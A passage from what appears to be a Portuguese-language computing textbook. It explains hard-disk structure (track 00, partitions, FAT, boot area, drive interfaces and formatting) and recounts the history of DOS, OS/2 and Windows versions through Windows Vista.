Quantidade de trilhas
Trilhas defeituosas
Quantidade de cabeças
Quantidade de cluster
Interlive
Índice dos arquivos
Endereços
Bootstrape

Se a trilha 00 estiver defeituosa fisicamente, o disco ou disquete,


ficará completamente inutilizado. Se o defeito for lógico, a solução
mais provável será o particionamento e a formatação lógica no caso
de HD (Hard Disk), ou somente a formatação lógica no caso de dis-
quete ou HD (Hard Disk).

Partição (lógica)

Particionar um HD (Hard Disk), significa estabelecer com qual siste-


ma operacional será a formatação e qual o espaço que esta partição

254
ocupará. Podem existir até quatro partições com sistemas operacio-
nais diferentes em um único HD (Hard Disk), neste caso existirá um
único disco físico com mais três discos lógicos, que serão C: D: E: F:.
Para criar estas partições, usa-se o arquivo FDISK.EXE.
O Sistema Operacional DOS 3.2, ou menor particiona só 32 Mb.
O Sistema Operacional DOS 3.3, só duas partições de 32 Mb. cada.
O Sistema Operacional DOS 4.0 ou maior, partições de 510 Mb. ca-
da.

Tabela FAT (lógica)

Está dentro da trilha 00 com informações referentes aos dados do


disco.

Bootstrape (lógica)

Também chamado de BOOT ou ÁREA DE BOOT. Está dentro da


trilha 00 com informações referentes ao disco, basicamente com in-
formações do Sistema Operacional, e é conveniente salientar que nos
primeiros 2Kb de gravação de dados desta área, os VÍRUS de BOOT
se instalam. Por menor que seja o defeito na ÁREA DE BOOT, físico
ou lógico, os dados gravados no HD (Hard Disk) ou em disquete esta-
rão irremediavelmente perdidos.

Travamento ou Parqueamento

Travar um HD (Hard Disk), significa posicionar as cabeças de leitura


e gravação para repouso em local não prejudicial aos discos e aos
dados neles contidos. Normalmente a última trilha dos discos do HD
(Hard Disk) é usada para o repouso das cabeças, para fins de trans-
porte, porque um HD (Hard Disk) não deve sofrer impactos maiores
de 20 gramas sob pena de sérias avarias, podendo ficar inutilizado de
forma definitiva. Travar um HD (Hard Disk) é quase uma prática co-
mum entre os usuários de microcomputadores, porém esta prática é
quase que desnecessária, já que a maioria dos HD (Hard Disk) acima
de 40 Mb são autopark, isto é, sempre que se desligar o computador,
automaticamente o HD (Hard Disk) posiciona as cabeças em local
seguro.

255
Siglas para identificar discos rígidos e controladoras

ST506 - Nome da interface criada pela empresa Shugart, atual Sea-


gate, que estabeleceu o padrão de 5 Mb para os primeiros discos
rígidos para PC.

MFM - Modified Frequency Modulation - Os discos MFM utilizam a


interface ST506 e possuem capacidade e performance limitadas. A
maior parte dos discos de 10 ou 20 Mb é dessa categoria.

RLL - Run Lenght Limited - Esses discos usam a mesma interface


ST506, mas armazena 50% de dados a mais, com velocidade um
pouco superior a dos discos MFM.

ESDI - Enhanced Small Device Interface - Essa corresponde a um


aperfeiçoamento da ST506. Permite grande capacidade de armaze-
namento e alta taxa de transferência de dados.

IDE - Inteligent Derive Electronics - Esses possuem uma controladora


interna e se conectam diretamente ao micro ou a uma controladora
tradicional. Atualmente são os existentes no mercado mundial.

SCSI - Small Computer System Interface - Esses também possuem


uma controladora interna, independente daquela que se conecta à
CPU do micro, que os torna mais rápidos. Tem também grande capa-
cidade de armazenamento de dados. São indicados para aplicações
multi-tarefas. Os HD (Hard Disk) de 550 Mb acima são do tipo SCSI-
2.

IDENTIFICAÇÃO - Os discos SEAGATE, como exemplo o ST238R,


são identificados da forma seguinte:

ST - Indicativo de um produto Seagate.


2 - O primeiro número indica o tamanho físico, assim:
1xxx - 3½ polegadas, slim
2xxx - 5¼ polegadas, slim
3xxx - 3½ polegadas, super slim
4xxx - 5¼ polegadas, altura inteira
6xxx - 9 polegadas

256
7xxx - 8 polegadas
9xxx - 2½ polegadas

Os dois ou três algarismos seguintes (xxx) indicam a capacidade


nominal do HD (Hard Disk). No exemplo, 38 Mb, que formatados ge-
ram aproximadamente 33 Mb. A letra final indica o tipo de interface
utilizada pelo disco.

R = RLL
A = AT Bus
X = XT Bus
E = ESDI
N = SCSI

Formatações

A maioria das controladoras do tipo MFM possui uma ROM cujo en-
dereço se sobrepõe à área do BOOT; assim, ao ligarmos o equipa-
mento, caso o disco rígido esteja devidamente formatado, a inicializa-
ção do sistema (ou seja, o BOOT) se dará via disco rígido.

Caso o disco não esteja formatado, passaremos automaticamente


para o processo de formatação física, graças a ROM contida na inter-
face.

Tal processo consiste em preparar a unidade de disco rígido para


receber a formatação lógica; na formatação física é onde marcamos
as trilhas defeituosas informadas pelo fabricante e onde criamos as
partições.

Para os novos HD (SATA) o formatador mais comum está contido no


próprio Windows, não havendo necessidade de intervenção de outros
programas.

O formatador do Windows também se aplica aos HDs mais antigos,


tipo MFM e IDE.

Havendo necessidade, o HD pode ser particionado, ou seja, dividido


em duas ou mais partições lógicas.

257
Assim, um HD de 1 TB pode ser particionado em duas partições de
500 GB, ou uma de 500 GB mais duas de 250 GB, ou quatro de
250GB, etc.

Sistemas Operacionais

Definição:
É um programa (sequência de instruções que o computador pode
executar) que controla uma série de outros programas, via comandos.
O que a BIOS e o Sistema Operacional gerenciam:

- o teclado;
- a realimentação do vídeo;
- tamanho da linha e o Formato da impressão;
- conteúdo dos discos;
- execução de programas (do sistema, do usuário, aplicativos, etc.);
- desenvolvimentos de programas (Pascal, Cobol, Clipper, Basic,
etc.);
- comunicação com outro computador;
- rodar programas no modo lote (ver arquivos de lote).

Funções intrínsecas do Sistema Operacional:

- faz a crítica do que você está digitando;


- emite mensagens de erro, quando for o caso;
- verifica e redireciona, se preciso, os dispositivos padrão de entrada
e saída;
- pesquisa se o comando pedido é interno ou externo e passa o con-
trole a ele (após carrega-lo, se externo).

DOS

O DOS - Disk Operating System - durante muito tempo foi o sistema


operacional padrão em micros de 16 bits ( semelhante ao CP/M que
foi padrão para os de 8 bits ) e surgiu em 1981 junto com o primeiro
IBM PC. Desenvolvido pela Microsoft, pois a IBM não imaginou que
as vendas desse micro pudessem ir muito longe, o DOS possuía dois

258
rótulos: PC-DOS comercializado pela IBM e MS-DOS comercializado
pela Microsoft.

Versões do MS-DOS

DOS 1.0 Esta primeira versão do PC-DOS comportava apenas discos


flexíveis de face simples e ocupava somente 10 Kb de RAM, pois o
PC tinha apenas 64 K de memória RAM. A versão 1.1 atualizou o
sistema para trabalhar com discos de densidade dupla. O primeiro
MS-DOS surgiu como versão 1.25.

DOS 2.0 Esta versão apareceu junto com o IBM XT em 1983, e per-
mitia o uso de discos rígidos de alta capacidade ( 10 Mb! ). O sistema
ocupava 25 Kb de RAM e 40 Kb de espaço em disco. O MS-DOS
equivalente tinha como versão 2.11 e trazia o comando COUNTRY a
mais.

DOS 3.0 Foi lançado com a chegada do AT em 1984, suportando o


então novo drive de 1.2 Mb e o utilitário VDISK ou RAM-DISK, que
utilizava a memória que ultrapassava os 640 Kb. Os clusters foram
reduzidos de 4 para 2 Kb. A versão 3.1 suportava redes. A versão 3.2
suportava os novos discos de 3 1/2 polegadas e 720 Kb. de capaci-
dade e possuía os comandos XCOPY e APREND. A versão 3.3 su-
portava drives de 1.44 Mb., partições do disco rígido de até 32 Mb e
introduziu o comando FASTOPEN. O sistema ocupava cerca de
30Kb. de RAM e 59 Kb. de espaço em disco.

DOS 4.0 Lançado em julho de 1988, quebrou a barreira dos 32 Mb.


para cada partição e apresentou uma interface gráfica chamada DOS
SHELL. Ocupava de 65 a 90 Kb. de RAM e 110 Kb. de espaço em
disco.

DOS 5.0 Esta versão possibilitava o uso de mais de dois discos rígi-
dos, partições de 2 Gb. no disco rígido, introduzia os comandos UN-
FORMAT, UNDELETE e DOSKEY, e possuía um gerenciamento
mais eficiente das memórias disponíveis (Upper, High, Extended e
Expanded).

259
DOS 6.0 Com esta versão, foi introduzido os recursos do SCANDISK,
DRIVESPACE, MEMMAKER, DEFRAG, ANTI VIRUS, MSD (Micro-
soft Diagnostics), DELTREE, além de aprimoramentos nos comandos
MOVE, COPY, FORMAT e INTERLINK (para transferência de arqui-
vos entre dois computadores).

Com a chegada do Windows 95, sistema operacional que não neces-


sita da prévia instalação do DOS, apesar de conter incorporado uma
versão reduzida, possivelmente chegamos ao fim das constantes
evoluções deste sistema operacional que acompanhou o usuário por
cerca de 15 anos.

O Os/2 Warp

O OS/2 Warp é um sistema operacional parecido com o Windows,


mas só que é da IBM.

OS/2 Versão 1.0 O OS/2 foi um esforço conjunto da IBM e da Micro-


soft para poder aproveitar o potencial das máquinas processadas por
Intel 386 que surgiam em 1985. Seu objetivo era substituir o DOS,
explorando a memória acima dos 640Kb e aproveitando a capacidade
de multitarefa que o novo processador oferecia.

Para gerenciar a multitarefa, o OS/2 ganhou uma GUI (Graphic User


Interface) baseada no Presentation Mananger. Incluída ainda na ver-
são 1.

Porém, a IBM sempre foi uma empresa voltada para o mercado cor-
porativo e seu objetivo sempre foi de oferecer soluções completas
para seus clientes. Um sistema operacional forte era necessário para
cativar sua clientela e a IBM investiu no OS/2 para chegar nesse sis-
tema. Assim, surgiu a versão Extended Edition.

OS/2 Versão 2.0 Porém, a Microsoft desenvolveu seu próprio "substi-


tuto" para o DOS. O Windows, que mesmo tendo uma aparência mui-
to semelhante ao OS/2, era tecnicamente inferior ao sistema que era
desenvolvido em conjunto com a IBM. Porém, contrariando tudo o
que se poderia prever, as vendas do Windows superavam em larga

260
escala as de OS/2. Assim, a versão 2 demorava a sair. Enquanto
isso, o Windows foi crescendo.

Porém, quando o OS/2 2.0 chegou, as diferenças entre ele e o Win-


dows eram impressionantes. A multitarefa do OS/2 era preceptiva
(real) e a do Windows não. E como o OS/2 rodava aplicações Win16
através de emulação a IBM adotou o seguinte slogan para seu siste-
ma: "Roda aplicações DOS melhor que o DOS e aplicações Windows
melhor que o Windows". Isso porque a Microsoft decidiu abandonar o
OS/2 e tocar o Windows sozinho.

Algumas das diferenças entre OS/2 e Windows iam além da arquite-


tura do sistema. Totalmente orientado a objeto, o OS/2 permitia des-
de sua versão 2 o arraste de ícones de pasta para pasta e outros
objetos, como o triturador e a impressora. E essa orientação é melhor
do que a de qualquer outro sistema. Além disso, cada pasta pode ter
suas próprias configurações de cores, papel de parede, etc.

Mesmo com vários pontos positivos, o OS/2 não vingou. Em 1 mês o


Windows vendeu mais do que o OS/2 em 3 anos. E esse foi a gota
para que a Microsoft esquecesse de vez o Operating System/2.

OS/2 Warp Versão 3.0 Com a Microsoft fora do desenvolvimento a


IBM sentiu-se mais a vontade para deixar o OS/2 com sua "cara".
Porém, sua estratégia de marketing surpreendeu a todos. Usando o
argumento de que o mercado doméstico havia rejeitado o OS/2 a Big
Blue decidiu orientar totalmente o seu sistema para as empresas.
Isso fez com que os boatos de "O OS/2 está morto" crescerem. E os
usuários domésticos acabaram por ignorar soluções diferentes do
Windows 3.11. No entanto, o sistema continuava a ser vendido para
pessoas físicas. O que dava esperanças de ter um sistema 32 bit
realmente poderoso em seus PCs.

Além da real orientação a objetos, uma das melhores ideias aplicadas


no OS/2 foi a Barra de Lançamento. Ela surgiu na versão 3. Sua fun-
ção é conter as operações e programas principais do sistema. Para
permitir ao usuário um acesso mais rápido aos seus programas e
objetos prediletos. Por ser totalmente customizável ela é adaptada
facilmente ao gosto do usuário.

261
OS/2 Warp Versão 4.0 Lançada no início de 1996, trouxe munição
para combater o Windows 95. Principalmente no tocante é estabilida-
de e confiabilidade. O OS/2 Warp 4.0 é o sistema operacional ideal
para missões críticas graças às suas virtudes técnicas, como o ge-
renciamento avançado de memória e o Crash Protection. Eles consis-
tem em ferramentas controladas pelo sistema para manter a máquina
operando normalmente e executando outras tarefas caso algum apli-
cativo provoque um erro de proteção de memória. Esse tipo de erro
facilmente derrubaria o Windows 95. Mas nos Grupos de Usuários e
nas listas de discussão sobre OS/2 vários usuários comentam suas
experiências com aplicativos problemáticos que foram retirados de
execução sem que o OS/2 tivesse panes ou os outros programas
fossem afetados. É verdade, no entanto, que nenhum sistema está
100% imune a erros, portanto, uma vez ou outra, o Netscape conse-
gue travar tudo. E então o reset é necessário. Porém é de se notar
que isso ocorre com pouca frequência no OS/2.

A interface do OS/2 mudou na versão 4. Ele manteve a Barra de Fer-


ramentas. Teve suas janelas redesenhadas e herdou o SmartCenter
do Lotus SmartSuite. Para quem já conhece o pacote ficou claro.
Para quem não conhece, o Smart Center é uma barra que fica em
uma extremidade de sua tela e permite que você chame diversas
funções e programas do pacote. No OS/2, essa barrinha milagrosa se
tornou o Warp Center. Nele você pode ter praticamente tudo (ou tudo
mesmo). Desde monitoramento de todos os HDs, CPU, passando
pelos programas que estão rodando, até ícones para chamar seus
programas favoritos e mesmo os Web Sites que você mais gosta,
além de poder ver com um simples clique todo o conteúdo de seu
ambiente de trabalho.

Várias melhorias deixaram o OS/2 ainda mais sólido. A orientação a


objetos é inteligente e rápida. Criar sombras (os equivalentes aos
atalhos do Win95) é simples e confiável. Depois dessa criação, se o
objeto original for movido, as sombras são atualizadas automatica-
mente, e o objeto é deletado, o sistema lhe pergunta o que você quer
fazer com a sombra. No Windows isso não existe!!! Ele simplesmente
deixa o atalho inútil e você teria de criar novos atalhos. Entre as me-
lhorias gráficas, foram mudados ícones da Barra de Ferramentas.

262
Além do mais, a notabilidade do OS/2 v. 4 sobre o Windows 95 es-
tende-se até sobre uma área (e pode-se dizer a única) onde o siste-
ma da Microsoft pode ser considerado superior: Os Jogos. Para rodar
jogos pesados o Windows tem que reiniciar o velho DOS.

Além do Quake, rodam Indycar, Nascar, Doom, e vários outros jogos.


Sempre com desempenho igual ou algumas vezes até superior à
execução em MS-DOS.

Por falar em execução, é bom lembrar que o OS/2 executa aplicações


do Windows 3.1 e Win32 s até a versão 1.25 a.

Além de aplicações JAVA nativamente. E aplicações PM para OS/2.


E com relação aquela história de que existem poucos programas para
OS/2. Isso é uma grande besteira, existem e são muito bons. A maio-
ria deles é bem melhor que seus equivalentes para Windows 95.

Versões do Windows

Na versão de 16 Bits:
Windows 1.0
Windows 2.0
Windows 3.xx

Na versão de 32 Bits:
Família 9x
Windows 95
Windows 98
Windows 98 SE
Windows ME

Família NT
Windows NT
Windows 2000
Windows Neptune
Windows Odyssey

Nas versõe de 32 e 64 Bits:

263
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows 8
Windows 8.1
Windows 10 (versão definitiva, com permanentes atualizações au-
tomáticas, via internet)

Na versão somente de 64 Bits:


Windows Server 2008 R2
Windows Server 2012

Windows 1.0
Era mais uma interface gráfica bidimensional para o MS-DOS e foi
lançado em 20 de Novembro de 1985. Era necessário o MS-DOS 2.0,
256 KB RAM e um disco rígido. Naquela altura, o MS-DOS só conse-
guia suportar 1 MB de aplicações. Era uma primeira tentativa de criar
um sistema multitarefa.

Nessa época, instalado em computadores XTs que tinham apenas


512Kb de memória, ocupava praticamente toda a memória disponível.

O Windows 1.01 não foi nenhum grande sucesso comparado com


seus sucessores da década de 1990, devido à limitação do hardware
da época. Inicialmente, ele foi lançado em quatro disquetes de 5.25
polegadas de 360 KB cada um.

Continha o Reversi (jogo), um calendário, bloco de notas, calculado-


ra, relógio, prompt de comando (uma janela direta para o DOS), Wri-
te, Control Panel, Paint e programas de comunicação. Permite a utili-
zação de mouse, janelas e ícones. Nesta versão ainda não havia
sobreposição de janelas.

Windows 2.0
Foi lançado em 1 de Novembro de 1987 e praticamente tem a mesma
interface do Windows 1.0x, com a diferença de apresentar mais re-
cursos, ferramentas e maior paleta de cores, embora os computado-

264
res daquela época fossem ainda muito lentos quando estes utilizavam
uma interface gráfica de boa qualidade. Permite a sobreposição de
janelas e estas podem maximizar e minimizar.

Era apresentado em oito disquetes de alta densidade de 5,25" de 360


KB cada um.

Em 27 de Maio de 1988, foi lançado o Windows 2.10, que era apre-


sentado em sete disquetes de dupla densidade de 3,5" de 720 KB
cada um, e era nada mais do que o Windows 2.03 reformulado.

Existem duas versões especiais do Windows 2.10:

Windows 2.10/286 foi lançada para aproveitar todos os recursos dos


microprocessadores 286;

Windows 2.10/386 foi lançada para aproveitar todo o potencial dos


microprocessadores 386.

Existe uma outra versão da família Windows 2.xx, o Windows 2.11,


que foi lançada em Março de 1989, com pequenas mudanças em
gerenciamento de memória, melhor impressão e drivers Postscript.

Windows 3.xx
Foi o primeiro sucesso amplo da Microsoft e foi lançado em 22 de
Maio de 1990. Ao contrário das versões anteriores, ele era um Win-
dows completamente novo. Tecnicamente hoje, esta versão é consi-
derada o primeiro sistema gráfico da empresa. Era um sistema gráfi-
co de 16 bits, mas ainda precisava ativar primeiro o MS-DOS para
ativar o Windows. Substituiu o MS-DOS Executive pelo Gerenciador
de Programas e o Gerenciador de Arquivos que simplificavam as
aplicações e tornava o sistema mais prático. Melhorou bastante a
interface, o gerenciamento de memória e o sistema multitarefa e in-
cluiu o suporte às fontes True Type. Conseguiu ultrapassar o limite de
1 MB do MS-DOS e permitiu a utilização máxima de 16 MB de aplica-
ções. Naquela época era o único possível de compatibilizar todos os
programas das versões anteriores. Utilizava o CPU Intel 80286 e Intel
80386. Também existe a versão 3.00a, que foi lançada em 31 de
Outubro de 1990.

265
Existem cinco versões especiais do Windows 3.00:

Windows with Multimedia Extensions - foi lançada por vários fabrican-


tes de periféricos multimídia, por isso ela não tem uma certa data de
lançamento. Tinha recursos multimídia (semelhantes aos do Windows
3.10) e era um pouco mais estável.

Windows 3.10 - foi lançada em 6 de Abril de 1992 e tinha softwares


para multimídia e fontes TrueType (aumenta muito o número de tipos
de letras disponíveis) e era mais estável do que o Windows 3.00. Ele
era apresentado em oito disquetes de alta densidade de 3,5" de 1,44
MB cada um. Nesta versão permitiu o uso de um maior número de
línguas de trabalho, incluindo o Cirílico e o Japonês. O Minesweeper
substituiu o Reversi.

Windows for Workgroups 3.11 - foi lançada 28 de Outubro de 1992, e


era praticamente o Windows 3.10 com suporte a rede, fax-
modem e correio eletrônico. Ele era apresentado em nove disquetes
de alta densidade de 3,5" de 1,44 MB cada um.

Windows 3.20 - nesta versão limitou-se em acrescentar o Chinês


como uma língua de trabalho.

Windows for Workgroups 3.12 - foi lançada 8 de Novembro de 1993 e


era praticamente a revisão da versão anterior.

Windows for Pen Computing - foi lançada em Abril de 1994 e tinha


todos os recursos do Windows for Workgroups 3,11 mais o suporte a
canetas para PCs.

Família 9x
Foi lançada em 24 de Agosto de 1995. Ele era um Windows comple-
tamente novo, e de nada lembra os Windows da família 3.xx. O salto
do Windows 3.0 ao Windows 95 era muito grande e ocorreu uma
mudança radical na forma da apresentação do interface. Introduziu o
Menu Iniciar e a Barra de Tarefas.

266
Enquanto Nesta versão, o MS-DOS perdeu parte da sua importância
visto que o Windows já consegue ativar-se sem precisar da depen-
dência prévia do MS-DOS. As limitações de memória oferecidas ain-
da pelo Windows 3.0 foram praticamente eliminadas nesta versão. O
sistema multitarefa tornou-se mais eficaz. Utilizava o sistema de fi-
cheiros FAT-16 (VFAT). Os ficheiros (arquivos) puderam a partir de
então ter 255 caracteres de nome (mais uma extensão de três carac-
teres que indica o conteúdo do arquivo, facilitando assim sua identifi-
cação e podendo ser associado para abertura em determinados pro-
gramas). O salto foi enorme, e o lançamento foi amplamente divulga-
do pela imprensa, inclusive pelas grandes redes de televisão.

Existe uma outra versão do Windows 95, lançada no início de 1996,


chamada de Windows 95 OEM Service Release 2 (OSR 2) com su-
porte nativo ao sistema de arquivos FAT32. Já o Windows 95, a partir
da revisão OSR 2.1, incluía o suporte nativo ao Barramento Serial
Universal (USB) e Ultra DMA (UDMA.

Foi lançada ainda uma versão especial, o Windows 95 Plus!, com um


pacote de diferentes temas visuais e sonoros para personalização do
sistema operacional. Esta versão também incluía o navega-
dor Internet Explorer.

Esta versão foi lançada em 25 de Junho de 1998. Foram corrigidas


muitas das falhas do seu antecessor. A maior novidade desta versão
era a completa integração do S.O. com a Internet. Utilizava o Internet
Explorer 4. Introduziu o sistema de arquivos FAT 32 e começou a
introduzir o teletrabalho (só foi possível devido à integração do Web).
Melhorou bastante a interface gráfica. Incluiu o suporte a muitos mo-
nitores e ao USB (Universal Serial Bus). Mas, por ser maior do que o
Windows 95 e possuir mais funções, era também mais lento e mais
instável. Nessa versão, nasce a restauração de sistema via MS-DOS
(Scanreg.exe /restore). A restauração de sistema visava corrigir pro-
blemas retornando o computador a um estado anteriormente acessa-
do (ontem, antes de ontem, etc).

Windows 98 SE
O Windows 98 Segunda Edição foi lançado em 1999 e esta versão
visava corrigir as falhas (bugs) e resolver os problemas de instabili-

267
dade do Windows 98. Incluía drivers e programas novos. Substituiu
o Internet Explorer 4 pela versão 5, que era mais rápida, e introduziu
a Internet Connection Sharing, que permite a partilha de uma "rede de
internet" para muitos computadores.

Acrescentou também o NetMeeting 3 e suporte a DVD. Muitos utiliza-


dores classificam este sistema como um dos melhores da Microsoft,
apesar de se tratar de um sistema operacional sem suporte a multita-
refa real, e ainda tendo o DOS como o seu núcleo principal. Mantinha
o mesmo núcleo.

Foi lançado pela Microsoft em 14 de Setembro de 2000, sendo esta a


última tentativa de disponibilizar um sistema baseado, ainda, no anti-
go Windows 95. Essa versão trouxe algumas inovações, como o su-
porte às máquinas fotográficas digitais, aos jogos multi jogador
na Internet e à criação de redes domésticas (home networking). Intro-
duziu o Movie Maker e o Windows Media Player 7 (para competir com
o Real Player) e atualizou alguns programas. Introduzia o recurso
"Restauração de Sistema" (que salvava o estado do sistema em uma
determinada data, útil para desfazer mudanças mal sucedidas) e o
Internet Explorer 5.5.

Algumas pessoas creem que este foi apenas uma terceira edição do
Windows 98 e que foi apenas um produto para dar resposta aos clien-
tes que esperavam por uma nova versão. Muitas pessoas achavam-
no defeituoso e instável, o que seria mais tarde comprovado pelo
abandono deste segmento em função da linha OS/2-NT4-2000-XP.
Na mesma época, foi lançada uma nova versão do Mac OS X e a
Microsoft, com receio de perder clientes, lançou o Windows ME para
que os fãs aguardassem o lançamento do Windows XP.

Família NT
O Windows NT foi lançado pela primeira vez pela Microsoft em 1993
com o objetivo principal de fornecer mais segurança e comodidade
aos utilizadores de empresas e lojas (meio corporativo), pois as ver-
sões do Windows disponíveis até então não eram suficientemente
estáveis e confiáveis. Foi um sistema operativo de 32 bits, multitarefa
e multiutilizador. A sigla NT significa Nova Tecnologia (New Techno-
logy em inglês). Trazia a funcionalidade de trabalhar como um servi-

268
dor de arquivos. Os NTs têm uma grande estabilidade e têm a vanta-
gem de não ter o MS-DOS.

A arquitetura desta versão é fortemente baseada no micronúcleo.


Assim, em teoria, pode-se remover, atualizar ou substituir qualquer
módulo sem a necessidade de alterar o resto do sistema. Cogita-se
que boa parte do código fonte do Windows NT seja baseado no OS/2,
um sistema operacional desenvolvido conjuntamente pela Microsoft
e IBM, mas desentendimentos entre as duas companhias levaram ao
fim da parceria e a IBM passou a se dedicar sozinha ao OS/2 e a
Microsoft ao Windows.

O Windows NT também tinha elementos dos sistemas VMS e Lan


Manager. Ele não era muito popularizado até ao aparecimento do
Windows 2000 (NT 5.0).

O Windows NT aceita três tipos de sistemas de arquivos FAT (Win-


dows NT 3xx e Windows NT 4.0); FAT32 (Windows 2000, Windows
XP e Windows 2003) e NTFS (Windows NT 4.0, Windows 2000, Win-
dows XP, Windows 2003, Windows vista e Windows 7).

Existem edições especiais:


NT 3.1 era muito semelhante ao Windows 3.1. Foi lançado em 1993.
Pode ser utilizado no Intel x86, DEC Alpha e MIPS CPUs.

NT 3.5 foi lançado em 1994 e era semelhante ao NT 3.1.

NT 3.51 foi lançado em 1995 e tinha uma interface semelhante ao


Windows 3.1 e trouxe algumas inovações nas áreas de gestão e dis-
tribuição de energia, podia executar um grande número de aplicações
Win32 do Windows 95. Mas foi rapidamente ultrapassado porque não
oferecia bons serviços de Internet.

NT 4.0 foi lançado em 1996 tinha uma interface semelhante ao Win-


dows 95 e era mais estável mas menos flexível do que o Windows 95.
Introduziu o Web Server, o Microsoft FrontPage, softwares de criação
e gestão de web sites, o Microsoft Transaction Server e o Microsoft
Message Queuing (o MSMQ melhora a comunicação).

269
NT 5.0 só foi produzido em versão Beta e posteriormente foi mudado
para Windows 2000. Tinha uma interface semelhante ao Windows 98.

Este Windows permaneceu sem popularidade até o fim da era 9x/ME,


quando lançaram o Windows 2000.

Nesta edição também foi implementada a ideia de Serviços (ou Pro-


cessos), no qual o sistema operacional trabalha a partir de serviços,
tendo assim menores chances de travar, pois era possível reinicializar
apenas um serviço ao invés da máquina por inteiro.

Estas versões do Windows aceitam quatro tipos de sistemas de ar-


quivos:

FAT 12 e 16 - Windows 1.0x, Windows 2.xx, Windows 3.xx, Windows


95, Windows 98, Windows ME, Windows NT 3.xx e Windows NT 4.0;
Windows 2000, Windows XP (32 bits) e Windows Server 2003 (32
bits) ; Windows Vista (32 bits), Windows 7 (32 bits) e Windows Server
2008 (32 bits).

FAT 32 - Windows NT 3.51 (com o PowerPack), Windows NT 4.0,


Windows 95 OSR 2.x, Windows 98, Windows 2000, Windows XP e
Windows Server 2003; Windows Vista, Windows 7 e Windows Server
2008 e 2008 R2 (Atualmente).

NTFS - Windows NT 3.xx, Windows NT 4.0, Windows 2000, Windows


XP, Windows Server 2003, Windows Vista, Windows 7 e Windows
Server 2008 e 2008 R2 (Atualmente).

Windows 2000
O lançamento:
Ocorreu em 17 de Fevereiro de 2000 (apesar do sistema estar data-
do 1999), que também era chamado de Windows NT 5.0 na sua fase
Beta, marcou o começo da era NT (Nova Tecnologia) para usuários
comuns. Sofreu problemas de aceitação no mercado, devido a falhas
de segurança, como, por exemplo, o armazenamento de senhas em
um arquivo próprio e visível, o que facilitava a ação de crackers e
invasores.

270
Em relação aos Windows anteriores, sua interface gráfica apresenta-
va sutis diferenças como um tom caque nos menus e na barra de
tarefas e ícones redesenhado, o mesmo que o ME usaria tempos
depois.

Apesar dos problemas iniciais, trata-se de um sistema operacional


bastante estável em 32 bits, multiusuário e multitarefa real. E por um
bom tempo muitos o preferiram em relação ao seu sucessor, o XP.

Nesta versão foi iniciada a criação e utilização de um novo sistema de


gerenciamento, baseado em LDAP, chamado pela Microsoft de Active
Directory, o que trazia diversas funções, como suporte a administra-
ção de usuários e grupos (como no NT 3.51 e 4.0) além das novas
opções como computadores, periféricos (impressoras, etc…) e OU´s
(Organization Unit).

Versões: Professional, Server, Advanced Server, Datacenter Server e


Small Business Server.

Windows Neptune
O Windows Neptune (em português: Windows Netuno) era uma
versão do Microsoft Windows de 32 bits que foi desenvolvida entre
janeiro de 1999 e janeiro de 2000, lançado em 25 de dezembro 1999,
sendo projetada como uma versão Home Edition do Windows 2000,
já que este sistema operacional era direcionado a empresas e as
pessoas não sabiam como usufruir de tantos recursos não necessá-
rios a elas. Se o projeto fosse continuado, seriam removidos os apli-
cativos empresariais, e o computador se tornaria muito mais multimí-
dia. Após a Microsoft parar (ou abandonar, como é dito por muitas
fontes) o desenvolvimento do sistema, muitas ideias não incluídas
nele e no Windows 2000 foram postas em prática no projeto Whistler
(lançado em 2001 como Windows XP) e a Microsoft lançou outro
sistema operacional para usuários baseada em DOS, o conhecido
Windows Me.

Windows Odyssey
Em meados de 1999 a 2000, a Microsoft estava desenvolvendo
um sistema operacional que foi cancelado pela empresa, o Windows
Odyssey. Ele sucederia o Windows 2000 e a Microsoft não quis se-

271
guir adiante com este sistema operacional, ninguém sabe o motivo do
cancelamento da empresa. Até hoje nada foi anunciado a não ser o
aviso que o mesmo estaria cancelado.

No lugar do Windows Odyssey veio o Windows XP. Outras informa-


ções indicam que foi cancelado e depois o Windows Odyssey se tor-
naria o Windows Vista.

Se esta informação for verdadeira, a Microsoft talvez teria cancelado


temporariamente o sistema por ser muito a frente de seu tempo ou
que necessitava de um hardware que na época era inacessível, em-
bora existam rumores de que, como foi cancelado o Windows Odys-
sey, nunca se saberá de fato como foi esta parada imediata no de-
senvolvimento deste sistema operacional.

32 e 64 Bits

Windows XP
Lançada em 25 de Outubro de 2001 essa versão é também conheci-
da como Windows NT 5.1. Roda em sistemas de arquivo FAT
32 ou NTFS.

A sigla XP deriva da palavra eXPeriência (eXPerience).

Uma das principais diferenças em relação às versões anteriores é


quanto à interface. Trata-se da primeira mudança radical desde o
lançamento do Windows 95. Baseada no OS/2 da IBM, cujos alguns
direitos são compartilhados entre a IBM e a Microsoft, e, seguindo a
linha OS/2-NT-2000-XP, a partir deste Windows, surgiu uma nova
interface.

Nota-se uma melhoria em termos de velocidade em relação às ver-


sões anteriores, especialmente na inicialização da máquina.

O suporte a hardware também foi melhorado em relação às versões


9x-Millenium, abandonada definitivamente.

272
Esta versão do Windows foi considerada por diversos anos como a
melhor versão lançada pela Microsoft para usuários domésticos, pos-
sui uma interface bastante simples e inovadora.

Como acontece na maioria dos lançamentos de nova versão do Sis-


tema Operacional, o aumento nos requisitos mínimos de recurso
(como 128Mb de memória RAM) pode ser considerado entrave no
início de suas vendas.

Versões:
Home, Professional, Tablet PC Edition, Media Center
Edition, Embedded, Starter Edition e 64-bit Edition
O nome de código desta versão, antes do lançamento era Whistler.

Windows Server 2003


Versão do Windows lançada em 24 de Abril de 2003, também conhe-
cida como Windows NT 5.2, é o sucessor das edições Server do
Windows 2000 para o ambiente corporativo. Novidades na área ad-
ministrativa, Active Directory, e automatização de operações.

Esta versão do Windows é voltada principalmente para servidores e


empresas de grande porte, possui recursos de servidores na ativa e
garante a segurança de dados.

Versões: Web Edition, Standard Edition (x86 e x64), Enterprise Edi-


tion (x86 e x64), Data Center Edition x64 e Small Business Server
(x86 e x64). Windows Server 2003 R2 (x86 e x64) Na ver-
são Windows Server 2003 R2, Foram introduzidas muitas novidades
se comparado ao seu antecessor.

Windows Vista
Também conhecido como Windows NT 6.0 e pelo nome de códi-
go Longhorn, o Windows Vista tem seis versões, uma delas simplifi-
cada e destinada aos países em desenvolvimento. Foi lançado em
novembro de 2006 e suas vendas ao público começaram em 30 de
Janeiro de 2007.

As seis edições diferentes do Windows Vista foram projetadas para


se ajustar ao modo como o usuário pretende usar seu PC. Ele tem

273
uma interface intitulada Windows Aero, com recursos de transparên-
cia, sistema de alternância 3D de janelas chamado Flip 3D (ativado
